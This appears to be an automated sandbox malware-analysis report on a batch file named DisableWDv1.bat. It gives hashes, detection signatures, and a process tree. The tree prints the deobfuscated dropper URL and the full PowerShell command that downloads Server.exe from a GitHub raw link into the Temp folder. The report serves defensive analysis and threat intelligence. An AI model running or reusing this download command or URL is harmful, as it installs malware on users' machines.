Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-01-2025 21:57
Static task
static1
Behavioral task
behavioral1
Sample
DisableWDv1.bat
Resource
win7-20240903-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
DisableWDv1.bat
Resource
win10v2004-20241007-en
16 signatures
150 seconds
General
-
Target
DisableWDv1.bat
-
Size
872B
-
MD5
7e36cba08cf2f7556651430989871ed3
-
SHA1
77cdb81c4081e6f3e3dd295738e6b0f128e414d9
-
SHA256
b40994ebf386e60512bb433bd2d59505dbe20c985a04772eb6c4bf65d2511e3a
-
SHA512
4cb8cae10769147c6e957d6c185520fd2663a87e55c1f332219cde1b877f915b29b278700d31d676276eb2d34f11aa1b1a34d5fb37cf47c8511bc00058deb924
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://raw.githubusercontent.com/pebiko70/test/main/Server.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 316 powershell.exe 6 316 powershell.exe -
pid Process 316 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 316 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2976 wrote to memory of 2516 2976 cmd.exe 31 PID 2976 wrote to memory of 2516 2976 cmd.exe 31 PID 2976 wrote to memory of 2516 2976 cmd.exe 31 PID 2516 wrote to memory of 1728 2516 net.exe 32 PID 2516 wrote to memory of 1728 2516 net.exe 32 PID 2516 wrote to memory of 1728 2516 net.exe 32 PID 2976 wrote to memory of 316 2976 cmd.exe 33 PID 2976 wrote to memory of 316 2976 cmd.exe 33 PID 2976 wrote to memory of 316 2976 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\DisableWDv1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:1728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pebiko70/test/main/Server.exe', 'C:\Users\Admin\AppData\Local\Temp\Server.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316
-